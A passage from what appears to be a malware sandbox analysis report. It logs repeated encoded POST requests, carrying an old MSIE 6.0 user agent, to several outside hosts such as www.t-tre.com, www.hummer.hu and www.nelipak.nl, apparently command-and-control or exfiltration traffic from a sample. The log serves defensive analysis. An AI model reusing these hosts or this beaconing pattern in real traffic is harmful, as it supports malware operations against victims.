58 70 77 51 42 4f 48 30 39 2f 43 55 71 72 48 42 65 62 36 59 46 4b 32 55 5a 51 4f 67 72 4a 4a 46 51 79 70 30 62 2b 35 73 74 63 79 32 5a 48 6d 74 7a 31 7a 35 53 4f 53 51 64 46 6d 36 4e 71 65 30 50 34 61 77 42 76 4c 65 59 75 54 4f 64 6d 75 42 61 4f 53 77 78 63 74 6b 38 79 59 30 2f 64 6b 41 43 76 63 65 63 71 49 48 70 76 4a 7a 49 4d 75 35 43 62 72 39 63 70 6f 4c 53 46 63 58 63 6b 44 6c 72 74 6a 4c 63 73 53 55 64 34 69 4c 43 38 77 32 6e 32 78 48 44 41 6a 7a 46 4d 61 62 69 62 55 56 31 7a 4a 37 49 59 6e 44 38 71 53 54 73 33 4e 79 67 77 4f 58 54 33 76 4b 49 6e 76 66 2b 31 62 68 35 66 57 78 77 6d 74 41 63 6a 37 4a 53 41 7a 45 6a 4f 43 44 6a 68 43 41 35 43 70 55 52 73 73 70 50 44 74 74 56 57 51 4f 39 2f 72 53 53 6e 76 74 6c 6f 77 4f 35 51 5a 51 69 56 72 6f 41 47 57 4c 73 30 61 71 54 66 47 6d 51 47 78 41 62 73 2f 47 74 52 6c 35 6a 4c 59 79 75 30 75 78 43 6f 61 2f 4f 55 78 4b 63 34 56 46 63 61 6d 66 35 64 74 56 78 5a 79 67 50 30 59 57 46 68 4e 31 32 44 54 36 6d 2f 5a 42 31 4c 52 52 63 4d 4a 50 6b 30 66 30 6a 37 45 4f 68 4c 78 59 4b 68 34 58 31 46 70 56 68 32 50 78 58 53 69 34 4f 4a 45 4c 6d 57 61 35 77 4a 43 4f 47 4a 76 59 3d Data Ascii: xYfArhChuf8k22aoo4GY6cM+PXo4PbLGRFkCtGKuk42aPbjXA2F5Y/AvL/WEn23u+9S4FCD4htq+EEfxRK+RoD8fzldfxlyAWap1sjA/PTodO0n0wA5XmbetI/UyjbaTUd6sHwtDn8XDp4DuK4Eh/2hF+5wHXOBW4dEk8NsRdmmXpwQBOH09/CUqrHBeb6YFK2UZQOgrJJFQyp0b+5stcy2ZHmtz1z5SOSQdFm6Nqe0P4awBvLeYuTOdmuBaOSwxctk8yY0/dkACvcecqIHpvJzIMu5Cbr9cpoLSFcXckDlrtjLcsSUd4iLC8w2n2xHDAjzFMabibUV1zJ7IYnD8qSTs3NygwOXT3vKInvf+1bh5fWxwmtAcj7JSAzEjOCDjhCA5CpURsspPDttVWQO9/rSSnvtlowO5QZQiVroAGWLs0aqTfGmQGxAbs/GtRl5jLYyu0uxCoa/OUxKc4VFcamf5dtVxZygP0YWFhN12DT6m/ZB1LRRcMJPk0f0j7EOhLxYKh4X1FpVh2PxXSi4OJELmWa5wJCOGJvY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 47 70 70 4d 75 47 2f 77 75 66 2f 41 32 79 73 70 6a 6d 4f 44 79 58 6a 45 76 33 79 46 56 52 46 64 45 77 2b 31 31 68 64 79 6b 49 52 4f 52 43 47 64 6a 6b 6b 63 33 56 71 44 52 5a 4d 44 78 73 6b 62 62 43 65 78 68 45 4d 76 47 66 64 74 71 2b 6a 41 72 73 51 73 52 31 6e 43 62 36 2b 50 79 64 34 37 4c 57 38 44 76 4c 50 4e 52 6a 67 63 66 62 7a 33 41 6a 7a 73 57 35 2f 4f 46 67 77 78 71 71 2f 48 70 69 4d 49 68 4c 45 35 36 43 59 33 76 38 50 59 63 75 4e 2f 37 6a 36 48 4f 39 41 4b 54 34 65 51 6d 50 6d 67 68 57 6e 35 49 46 30 52 58 31 65 57 36 71 66 46 68 6e 73 50 46 2f 36 4d 38 6c 51 38 38 76 79 4d 39 71 4d 54 33 68 66 6d 68 6c 6d 78 4f 48 55 6a 45 42 6b 6b 67 6c 46 2f 6b 77 53 41 44 6c 64 65 68 51 51 44 5a 55 78 51 66 61 34 76 6f 46 51 64 30 66 42 30 53 6b 67 78 66 42 54 69 45 4b 35 35 57 70 64 37 48 51 57 67 4a 57 69 4b 6e 63 49 77 32 69 7a 67 67 77 51 54 49 77 75 43 78 57 4c 49 45 51 77 41 2f 70 31 4c 74 2f 4d 4e 50 47 79 39 7a 48 54 55 69 70 4f 61 4d 67 70 33 51 36 59 4f 7a 74 54 62 48 42 70 30 34 63 69 43 43 2b 6b 4f 49 73 39 48 58 61 71 33 37 54 73 4b 42 79 6e 53 50 59 6f 49 32 73 57 37 35 2f 4b 4b 50 79 44 6b 67 6b 63 6d 6a 77 48 50 4f 33 62 62 47 57 35 56 77 74 69 34 57 33 62 41 52 51 49 71 6f 61 64 36 68 46 56 70 57 73 73 61 6c 34 4d 34 43 73 4f 61 64 6f 4c 4e 59 7a 45 37 39 47 7a 74 39 44 74 35 4f 4f 48 74 6b 7a 50 4a 32 38 6f 63 66 69 68 6b 58 79 34 69 6e 50 36 2f 4c 44 7a 51 47 6e 37 69 31 41 2b 33 63 70 75 6b 36 59 67 6a 63 67 44 74 44 6c 79 72 36 78 6c 6a 36 44 50 49 35 67 48 33 37 51 69 79 74 59 33 34 77 76 35 4e 4f 6b 53 73 4d 70 67 45 55 73 48 6f 39 72 63 74 70 6a 6a 4a 39 47 5a 65 78 76 79 7a 35 43 45 53 37 58 36 38 49 4d 5a 45 4c 56 68 55 2f 57 48 70 46 54 62 7a 30 72 69 77 66 31 6d 5a 32 65 68 4c 31 42 58 6b 39 43 6a 37 33 41 3d 3d Data Ascii: GppMuG/wuf/A2yspjmODyXjEv3yFVRFdEw+11hdykIRORCGdjkkc3VqDRZMDxskbbCexhEMvGfdtq+jArsQsR1nCb6+Pyd47LW8DvLPNRjgcfbz3AjzsW5/OFgwxqq/HpiMIhLE56CY3v8PYcuN/7j6HO9AKT4eQmPmghWn5IF0RX1eW6qfFhnsPF/6M8lQ88vyM9qMT3hfmhlmxOHUjEBkkglF/kwSADldehQQDZUxQfa4voFQd0fB0SkgxfBTiEK55Wpd7HQWgJWiKncIw2izggwQTIwuCxWLIEQwA/p1Lt/MNPGy9zHTUipOaMgp3Q6YOztTbHBp04ciCC+kOIs9HXaq37TsKBynSPYoI2sW75/KKPyDkgkcmjwHPO3bbGW5Vwti4W3bARQIqoad6hFVpWssal4M4CsOadoLNYzE79Gzt9Dt5OOHtkzPJ28ocfihkXy4inP6/LDzQGn7i1A+3cpuk6YgjcgDtDlyr6xlj6DPI5gH37QiytY34wv5NOkSsMpgEUsHo9rctpjjJ9GZexvyz5CES7X68IMZELVhU/WHpFTbz0riwf1mZ2ehL1BXk9Cj73A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 78 59 66 41 72 68 43 68 75 66 38 6b 32 32 61 6f 6f 34 47 59 36 63 4d 2b 50 58 6f 34 50 62 4c 47 52 46 6b 43 74 47 4b 75 6b 34 32 61 50 62 6a 58 41 32 46 35 59 2f 41 76 4c 2f 57 45 6e 32 33 75 2b 39 53 34 46 43 44 34 68 74 71 2b 45 45 66 78 52 4b 2b 52 6f 44 38 66 7a 6c 64 66 78 6c 79 41 57 61 70 31 73 6a 41 2f 50 54 6f 64 4f 30 6e 30 77 41 35 58 6d 62 65 74 49 2f 55 79 6a 62 61 54 55 64 36 73 48 77 74 44 6e 38 58 44 70 34 44 75 4b 34 45 68 2f 32 68 46 2b 35 77 48 58 4f 42 57 34 64 45 6b 38 4e 73 52 64 6d 6d 58 70 77 51 42 4f 48 30 39 2f 43 55 71 72 48 42 65 62 36 59 46 4b 32 55 5a 51 4f 67 72 4a 4a 46 51 79 70 30 62 2b 35 73 74 63 79 32 5a 48 6d 74 7a 31 7a 35 53 4f 53 51 64 46 6d 36 4e 71 65 30 50 34 61 77 42 76 4c 65 59 75 54 4f 64 6d 75 42 61 4f 53 77 78 63 74 6b 38 79 59 30 2f 64 6b 41 43 76 63 65 63 71 49 48 70 76 4a 7a 49 4d 75 35 43 62 72 39 63 70 6f 4c 53 46 63 58 63 6b 44 6c 72 74 6a 4c 63 73 53 55 64 34 69 4c 43 38 77 32 6e 32 78 48 44 41 6a 7a 46 4d 61 62 69 62 55 56 31 7a 4a 37 49 59 6e 44 38 71 53 54 73 33 4e 79 67 77 4f 58 54 33 76 4b 49 6e 76 66 2b 31 62 68 35 66 57 78 77 6d 74 41 63 6a 37 4a 53 41 7a 45 6a 4f 43 44 6a 68 43 41 35 43 70 55 52 73 73 70 50 44 74 74 56 57 51 4f 39 2f 72 53 53 6e 76 74 6c 6f 77 4f 35 51 5a 51 69 56 72 6f 41 47 57 4c 73 30 61 71 54 66 47 6d 51 47 78 41 62 73 2f 47 74 52 6c 35 6a 4c 59 79 75 30 75 78 43 6f 61 2f 4f 55 78 4b 63 34 56 46 63 61 6d 66 35 64 74 56 78 5a 79 67 50 30 59 57 46 68 4e 31 32 44 54 36 6d 2f 5a 42 31 4c 52 52 63 4d 4a 50 6b 30 66 30 6a 37 45 4f 68 4c 78 59 4b 68 34 58 31 46 70 56 68 32 50 78 58 53 69 34 4f 4a 45 4c 6d 57 61 35 77 4a 43 4f 47 4a 76 59 3d Data Ascii: xYfArhChuf8k22aoo4GY6cM+PXo4PbLGRFkCtGKuk42aPbjXA2F5Y/AvL/WEn23u+9S4FCD4htq+EEfxRK+RoD8fzldfxlyAWap1sjA/PTodO0n0wA5XmbetI/UyjbaTUd6sHwtDn8XDp4DuK4Eh/2hF+5wHXOBW4dEk8NsRdmmXpwQBOH09/CUqrHBeb6YFK2UZQOgrJJFQyp0b+5stcy2ZHmtz1z5SOSQdFm6Nqe0P4awBvLeYuTOdmuBaOSwxctk8yY0/dkACvcecqIHpvJzIMu5Cbr9cpoLSFcXckDlrtjLcsSUd4iLC8w2n2xHDAjzFMabibUV1zJ7IYnD8qSTs3NygwOXT3vKInvf+1bh5fWxwmtAcj7JSAzEjOCDjhCA5CpURsspPDttVWQO9/rSSnvtlowO5QZQiVroAGWLs0aqTfGmQGxAbs/GtRl5jLYyu0uxCoa/OUxKc4VFcamf5dtVxZygP0YWFhN12DT6m/ZB1LRRcMJPk0f0j7EOhLxYKh4X1FpVh2PxXSi4OJELmWa5wJCOGJvY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 62 5a 71 37 36 30 66 73 77 2f 38 30 49 47 6d 6b 64 6a 78 31 58 42 43 71 47 4a 6b 39 4b 6b 38 2f 61 35 79 31 66 77 6d 68 70 35 7a 33 32 66 63 6a 68 45 76 46 47 79 48 47 70 39 6a 72 74 2b 32 34 70 43 34 41 77 59 4d 49 2b 68 47 38 35 41 2f 43 46 68 61 78 4f 71 67 71 68 64 51 69 42 5a 77 52 35 4a 65 66 45 39 33 79 43 6a 67 56 6e 4b 30 52 6c 71 35 59 62 59 70 46 39 43 75 4a 47 78 32 77 6d 68 77 77 59 77 75 2f 50 41 76 30 70 71 79 68 66 4c 2b 63 75 56 6f 64 48 67 70 45 52 54 32 36 75 51 50 45 47 78 51 50 43 2f 49 55 6b 58 48 36 65 41 55 67 43 44 57 36 72 34 2f 50 4d 61 57 2b 5a 52 34 6c 67 57 33 67 4c 7a 31 6d 4c 52 4e 4a 4e 4b 6a 37 77 7a 76 44 7a 5a 47 6f 49 39 5a 56 63 76 42 33 49 65 4e 6a 38 6a 4b 78 56 67 4d 4a 30 59 78 6d 7a 35 55 64 45 6e 38 4b 5a 39 61 56 42 43 74 6d 46 67 55 56 75 70 61 43 75 4b 71 58 56 2f 35 71 70 78 75 6c 37 41 32 74 33 77 46 46 52 32 64 73 35 64 78 4a 63 32 6c 50 43 54 52 30 32 52 66 43 31 45 30 6c 59 65 71 56 6f 78 6e 75 35 66 30 68 48 32 61 51 44 6a 53 73 35 2b 44 4a 59 55 42 69 6f 50 4a 36 74 41 6f 6e 65 48 42 69 4e 38 2b 65 76 61 32 6a 54 76 46 4d 74 4f 50 6e 66 6c 2b 49 68 6f 39 61 5a 6c 6f 69 6f 49 50 57 77 45 6c 30 69 59 49 65 4b 7a 57 79 7a 54 71 56 2b 73 49 78 54 32 79 71 36 66 67 6b 55 2b 36 47 77 52 4f 55 48 74 52 75 68 41 4f 35 2f 2b 6f 71 5a 4b 42 66 52 5a 35 61 76 57 67 50 4b 76 68 32 30 49 61 63 69 71 39 2b 54 2b 31 6a 51 54 54 6e 77 58 2f 32 57 30 4e 70 63 41 42 4b 4f 64 37 46 36 54 53 76 79 52 35 32 74 4b 4d 62 75 61 54 76 55 4e 4e 63 34 50 64 4c 30 36 61 42 66 79 75 4d 6c 68 4f 2b 50 66 4b 56 77 66 4b 32 58 77 63 42 6c 6d 66 52 50 43 76 70 62 4c 7a 62 63 6f 66 62 66 64 32 6b 76 33 70 32 79 43 4e 33 5a 5a 57 33 6d 4e 6f 67 57 34 51 63 79 75 36 39 Data Ascii: bZq760fsw/80IGmkdjx1XBCqGJk9Kk8/a5y1fwmhp5z32fcjhEvFGyHGp9jrt+24pC4AwYMI+hG85A/CFhaxOqgqhdQiBZwR5JefE93yCjgVnK0Rlq5YbYpF9CuJGx2wmhwwYwu/PAv0pqyhfL+cuVodHgpERT26uQPEGxQPC/IUkXH6eAUgCDW6r4/PMaW+ZR4lgW3gLz1mLRNJNKj7wzvDzZGoI9ZVcvB3IeNj8jKxVgMJ0Yxmz5UdEn8KZ9aVBCtmFgUVupaCuKqXV/5qpxul7A2t3wFFR2ds5dxJc2lPCTR02RfC1E0lYeqVoxnu5f0hH2aQDjSs5+DJYUBioPJ6tAoneHBiN8+eva2jTvFMtOPnfl+Iho9aZloioIPWwEl0iYIeKzWyzTqV+sIxT2yq6fgkU+6GwROUHtRuhAO5/+oqZKBfRZ5avWgPKvh20Iaciq9+T+1jQTTnwX/2W0NpcABKOd7F6TSvyR52tKMbuaTvUNNc4PdL06aBfyuMlhO+PfKVwfK2XwcBlmfRPCvpbLzbcofbfd2kv3p2yCN3ZZW3mNogW4Qcyu69
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 72 33 45 65 37 63 33 33 77 2f 38 47 79 51 55 6e 52 44 59 6a 67 59 5a 70 6c 43 77 37 57 2f 38 69 55 51 31 33 73 6d 4e 69 42 4e 4a 6f 55 68 65 46 36 61 48 5a 49 45 7a 68 51 4e 77 30 48 46 6f 78 55 45 4f 78 43 71 37 6a 55 51 6f 72 71 63 65 6b 37 4a 68 32 66 30 48 69 62 49 39 6b 57 6c 67 4a 48 54 6e 6a 2f 36 55 75 58 6a 6c 76 4f 74 59 42 50 47 47 42 4e 39 74 71 42 4e 64 67 34 47 76 68 34 68 4f 43 42 71 6c 43 33 57 42 69 62 6f 74 32 6f 4f 47 7a 42 62 57 76 2b 64 55 34 41 62 32 71 56 33 78 52 42 48 49 58 35 2b 38 61 64 46 32 77 53 76 68 6e 72 68 75 32 55 4d 49 66 4e 31 66 41 34 2b 43 77 65 6c 52 73 49 48 62 53 2b 43 47 74 41 50 4c 5a 4b 66 50 70 49 6e 41 6c 54 70 6d 4c 62 6f 6d 56 71 5a 47 47 6b 45 55 2b 54 4c 5a 46 2b 43 4b 6d 72 66 46 6d 77 6f 44 62 33 56 7a 57 37 4e 69 78 79 62 44 4e 39 47 4d 4e 63 2b 4d 72 43 6c 50 33 67 55 43 33 49 34 66 49 47 57 55 34 4d 52 59 61 50 64 6c 6a 4f 48 59 6a 47 73 69 39 35 58 65 2f 36 35 31 33 63 59 6c 45 35 4f 39 78 32 37 64 61 44 6e 37 6e 47 6f 4b 66 6c 58 6f 47 6e 77 44 63 38 47 45 4a 75 2b 52 35 51 62 6c 5a 43 6b 63 67 56 63 55 4c 36 2b 67 4e 70 6a 63 72 78 37 79 31 54 64 51 2f 6c 6e 36 75 62 31 6f 6f 79 4c 6d 56 78 51 43 4f 77 68 46 67 65 4d 4f 57 4d 4a 7a 7a 56 79 63 72 58 77 61 63 62 54 78 62 4e 6b 2f 58 35 32 55 65 6f 32 49 61 75 52 33 38 67 68 36 71 4d 30 47 6b 65 48 73 36 6b 58 32 34 30 53 45 58 69 76 49 5a 34 56 4c 49 41 54 31 59 31 6b 79 51 6c 59 57 47 76 76 6e 6f 4b 34 58 67 72 41 70 64 31 37 33 53 57 43 4f 2f 4d 78 34 69 69 44 78 6c 30 57 34 58 66 36 67 4f 61 75 43 4a 44 70 50 54 61 49 68 42 55 50 62 50 6d 36 7a 52 63 30 33 6d 58 68 32 55 35 76 34 57 6c 39 6d 62 56 62 4b 2b 78 62 7a 55 59 4f 5a 6c 5a 4b 7a 61 Data Ascii: r3Ee7c33w/8GyQUnRDYjgYZplCw7W/8iUQ13smNiBNJoUheF6aHZIEzhQNw0HFoxUEOxCq7jUQorqcek7Jh2f0HibI9kWlgJHTnj/6UuXjlvOtYBPGGBN9tqBNdg4Gvh4hOCBqlC3WBibot2oOGzBbWv+dU4Ab2qV3xRBHIX5+8adF2wSvhnrhu2UMIfN1fA4+CwelRsIHbS+CGtAPLZKfPpInAlTpmLbomVqZGGkEU+TLZF+CKmrfFmwoDb3VzW7NixybDN9GMNc+MrClP3gUC3I4fIGWU4MRYaPdljOHYjGsi95Xe/6513cYlE5O9x27daDn7nGoKflXoGnwDc8GEJu+R5QblZCkcgVcUL6+gNpjcrx7y1TdQ/ln6ub1ooyLmVxQCOwhFgeMOWMJzzVycrXwacbTxbNk/X52Ueo2IauR38gh6qM0GkeHs6kX240SEXivIZ4VLIAT1Y1kyQlYWGvvnoK4XgrApd173SWCO/Mx4iiDxl0W4Xf6gOauCJDpPTaIhBUPbPm6zRc03mXh2U5v4Wl9mbVbK+xbzUYOZlZKza
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 39 59 64 4f 39 64 30 37 78 50 39 6f 76 4b 34 6d 46 41 76 56 51 52 59 59 74 35 69 4c 47 46 39 2b 59 51 4b 59 71 36 53 52 4d 47 34 69 6a 42 64 36 6a 51 57 66 42 31 4d 34 32 6f 6c 66 51 2b 57 7a 57 54 59 44 54 30 61 4a 6e 68 41 72 48 50 74 75 6e 58 77 4e 6b 42 78 6c 39 58 56 47 6e 52 33 2b 53 56 6d 4f 77 74 59 42 76 62 77 6c 2f 76 36 36 43 65 63 75 76 78 44 6d 33 65 54 4f 45 31 37 35 31 6d 61 65 68 68 71 67 6c 31 38 67 57 70 36 45 51 59 7a 73 79 34 72 4a 4b 32 52 70 39 65 43 73 45 34 4f 61 4b 35 62 56 52 53 67 49 34 7a 39 37 43 67 32 33 4f 4a 4b 54 6f 59 46 67 53 36 51 68 67 4e 4b 68 65 68 71 54 5a 48 44 5a 67 2f 56 46 67 4e 4d 43 31 4a 73 4c 37 34 61 35 4b 5a 62 39 6e 78 63 6f 2b 4c 4c 68 69 42 48 61 6f 78 47 72 4b 45 73 37 68 69 2f 52 61 6d 78 38 64 39 35 4b 67 67 35 7a 6a 41 51 78 6b 2f 41 79 79 61 31 4e 6f 39 59 4d 38 52 4b 43 68 61 79 6e 61 5a 51 37 6c 73 4c 46 71 77 74 39 67 6c 6a 36 76 70 61 4f 74 37 2b 48 70 39 6a 59 53 72 39 70 59 74 6a 74 77 44 7a 31 6d 67 79 55 55 5a 71 4b 77 53 4a 38 4f 30 65 4a 76 37 45 79 39 50 59 6b 76 30 54 2b 46 57 5a 5a 52 76 64 6e 43 32 34 47 64 70 35 7a 32 62 2f 71 6e 54 4a 69 47 39 69 48 2b 37 36 79 69 63 71 68 2b 5a 78 68 71 46 71 36 76 33 36 54 67 4d 33 56 4a 70 72 45 75 67 6f 59 52 4e 44 32 31 41 4e 71 70 38 79 61 6c 6d 5a 75 72 59 57 57 4a 43 77 66 46 53 74 45 43 66 4e 35 74 6e 33 56 69 6c 51 77 78 44 31 57 6f 51 51 75 65 33 50 63 47 66 2b 6f 63 54 53 43 47 35 67 63 65 36 57 79 4e 4a 71 78 48 64 31 68 52 45 69 67 68 36 35 50 72 45 48 76 66 6a 6b 33 67 6d 70 52 6e 6b 71 61 38 70 48 48 4b 68 56 6b 38 58 75 77 58 50 65 76 4c 37 65 4f 4f 53 52 75 32 6b 34 79 6e 77 69 59 53 49 50 72 65 71 42 34 72 5a 59 77 Data Ascii: 9YdO9d07xP9ovK4mFAvVQRYYt5iLGF9+YQKYq6SRMG4ijBd6jQWfB1M42olfQ+WzWTYDT0aJnhArHPtunXwNkBxl9XVGnR3+SVmOwtYBvbwl/v66CecuvxDm3eTOE1751maehhqgl18gWp6EQYzsy4rJK2Rp9eCsE4OaK5bVRSgI4z97Cg23OJKToYFgS6QhgNKhehqTZHDZg/VFgNMC1JsL74a5KZb9nxco+LLhiBHaoxGrKEs7hi/Ramx8d95Kgg5zjAQxk/Ayya1No9YM8RKChaynaZQ7lsLFqwt9glj6vpaOt7+Hp9jYSr9pYtjtwDz1mgyUUZqKwSJ8O0eJv7Ey9PYkv0T+FWZZRvdnC24Gdp5z2b/qnTJiG9iH+76yicqh+ZxhqFq6v36TgM3VJprEugoYRND21ANqp8yalmZurYWWJCwfFStECfN5tn3VilQwxD1WoQQue3PcGf+ocTSCG5gce6WyNJqxHd1hREigh65PrEHvfjk3gmpRnkqa8pHHKhVk8XuwXPevL7eOOSRu2k4ynwiYSIPreqB4rZYw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 47 70 70 4d 75 47 2f 77 75 66 2f 41 32 79 73 70 6a 6d 4f 44 79 58 6a 45 76 33 79 46 56 52 46 64 45 77 2b 31 31 68 64 79 6b 49 52 4f 52 43 47 64 6a 6b 6b 63 33 56 71 44 52 5a 4d 44 78 73 6b 62 62 43 65 78 68 45 4d 76 47 66 64 74 71 2b 6a 41 72 73 51 73 52 31 6e 43 62 36 2b 50 79 64 34 37 4c 57 38 44 76 4c 50 4e 52 6a 67 63 66 62 7a 33 41 6a 7a 73 57 35 2f 4f 46 67 77 78 71 71 2f 48 70 69 4d 49 68 4c 45 35 36 43 59 33 76 38 50 59 63 75 4e 2f 37 6a 36 48 4f 39 41 4b 54 34 65 51 6d 50 6d 67 68 57 6e 35 49 46 30 52 58 31 65 57 36 71 66 46 68 6e 73 50 46 2f 36 4d 38 6c 51 38 38 76 79 4d 39 71 4d 54 33 68 66 6d 68 6c 6d 78 4f 48 55 6a 45 42 6b 6b 67 6c 46 2f 6b 77 53 41 44 6c 64 65 68 51 51 44 5a 55 78 51 66 61 34 76 6f 46 51 64 30 66 42 30 53 6b 67 78 66 42 54 69 45 4b 35 35 57 70 64 37 48 51 57 67 4a 57 69 4b 6e 63 49 77 32 69 7a 67 67 77 51 54 49 77 75 43 78 57 4c 49 45 51 77 41 2f 70 31 4c 74 2f 4d 4e 50 47 79 39 7a 48 54 55 69 70 4f 61 4d 67 70 33 51 36 59 4f 7a 74 54 62 48 42 70 30 34 63 69 43 43 2b 6b 4f 49 73 39 48 58 61 71 33 37 54 73 4b 42 79 6e 53 50 59 6f 49 32 73 57 37 35 2f 4b 4b 50 79 44 6b 67 6b 63 6d 6a 77 48 50 4f 33 62 62 47 57 35 56 77 74 69 34 57 33 62 41 52 51 49 71 6f 61 64 36 68 46 56 70 57 73 73 61 6c 34 4d 34 43 73 4f 61 64 6f 4c 4e 59 7a 45 37 39 47 7a 74 39 44 74 35 4f 4f 48 74 6b 7a 50 4a 32 38 6f 63 66 69 68 6b 58 79 34 69 6e 50 36 2f 4c 44 7a 51 47 6e 37 69 31 41 2b 33 63 70 75 6b 36 59 67 6a 63 67 44 74 44 6c 79 72 36 78 6c 6a 36 44 50 49 35 67 48 33 37 51 69 79 74 59 33 34 77 76 35 4e 4f 6b 53 73 4d 70 67 45 55 73 48 6f 39 72 63 74 70 6a 6a 4a 39 47 5a 65 78 76 79 7a 35 43 45 53 37 58 36 38 49 4d 5a 45 4c 56 68 55 2f 57 48 70 46 54 62 7a 30 72 69 77 66 31 6d 5a 32 65 68 4c 31 42 58 6b 39 43 6a 37 33 41 3d 3d Data Ascii: GppMuG/wuf/A2yspjmODyXjEv3yFVRFdEw+11hdykIRORCGdjkkc3VqDRZMDxskbbCexhEMvGfdtq+jArsQsR1nCb6+Pyd47LW8DvLPNRjgcfbz3AjzsW5/OFgwxqq/HpiMIhLE56CY3v8PYcuN/7j6HO9AKT4eQmPmghWn5IF0RX1eW6qfFhnsPF/6M8lQ88vyM9qMT3hfmhlmxOHUjEBkkglF/kwSADldehQQDZUxQfa4voFQd0fB0SkgxfBTiEK55Wpd7HQWgJWiKncIw2izggwQTIwuCxWLIEQwA/p1Lt/MNPGy9zHTUipOaMgp3Q6YOztTbHBp04ciCC+kOIs9HXaq37TsKBynSPYoI2sW75/KKPyDkgkcmjwHPO3bbGW5Vwti4W3bARQIqoad6hFVpWssal4M4CsOadoLNYzE79Gzt9Dt5OOHtkzPJ28ocfihkXy4inP6/LDzQGn7i1A+3cpuk6YgjcgDtDlyr6xlj6DPI5gH37QiytY34wv5NOkSsMpgEUsHo9rctpjjJ9GZexvyz5CES7X68IMZELVhU/WHpFTbz0riwf1mZ2ehL1BXk9Cj73A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 54 44 43 65 74 38 6a 71 75 66 39 35 2f 4c 4c 66 43 34 2f 7a 4f 54 73 46 4c 44 31 51 42 54 61 58 66 47 4b 70 52 71 46 48 34 53 7a 62 42 57 74 6a 71 6d 66 30 56 58 38 42 7a 49 35 68 62 6d 44 75 6f 2b 42 48 50 54 4d 56 35 76 61 44 5a 34 4f 66 4b 7a 32 51 61 4f 65 41 36 44 7a 6e 72 4e 72 32 47 66 6d 34 34 78 77 68 6f 4c 66 42 4e 4d 59 71 6f 38 4c 5a 44 34 69 64 66 4b 71 34 6e 73 6d 52 7a 52 31 33 32 4e 2b 74 39 58 78 41 4a 39 39 76 2b 79 73 71 36 75 44 39 6a 50 62 67 72 41 4d 38 43 64 35 31 58 6e 69 53 39 6a 32 36 68 2f 4d 39 4f 77 6e 4a 76 2f 74 73 79 4f 72 72 38 77 78 42 46 78 69 6c 69 42 79 77 79 30 70 65 65 43 6f 5a 58 6d 4b 78 59 61 67 30 7a 47 42 5a 5a 4e 32 69 31 42 7a 48 4d 52 74 4e 62 45 5a 55 57 56 44 4e 32 65 31 69 34 35 70 42 7a 47 65 6e 33 42 55 52 7a 65 48 30 30 56 52 58 2b 55 6b 39 70 31 37 2f 7a 49 4e 48 37 41 30 37 37 58 4f 38 4c 6e 41 2f 61 6b 72 48 34 6e 6b 4a 71 4f 37 43 7a 74 77 6e 36 72 76 6b 43 77 4d 4a 61 4e 36 50 67 68 49 33 39 6c 4e 4a 67 79 6c 51 37 4e 73 77 4f 41 46 73 6a 72 41 34 32 79 44 34 37 77 39 61 38 2f 6a 77 72 4d 4e 34 2b 74 6a 38 67 66 6b 78 71 4f 78 30 56 64 75 4f 33 35 66 58 62 4b 31 67 4a 7a 77 4a 47 75 4f 30 31 43 67 31 30 50 68 4d 6a 47 70 31 47 4a 50 77 6b 45 68 62 6e 4a 38 57 6b 72 4b 53 64 4c 50 37 64 38 75 43 52 6d 52 44 39 49 39 55 56 46 73 47 78 5a 75 56 61 34 72 39 54 79 49 6f 6b 6c 64 6c 48 58 4d 4e 62 43 6f 79 4c 38 73 33 64 64 6b 73 65 75 42 79 6e 33 72 43 48 48 4c 51 49 51 34 63 46 6e 65 57 30 57 44 6e 6e 39 72 66 71 5a 77 79 6d 6e 67 72 42 67 72 66 54 63 46 39 46 75 35 58 79 34 45 55 63 61 4e 38 63 74 4e 2f 36 47 73 75 54 46 6a 4a 4e 49 43 43 79 45 69 35 51 75 2f 6e 59 48 38 62 4a 6a 58 5a 4a 38 62 7a 51 37 31 30 33 62 4d 2f 30 57 42 79 6d 74 4d 4c 6d 78 65 41 57 56 33 6d Data Ascii: 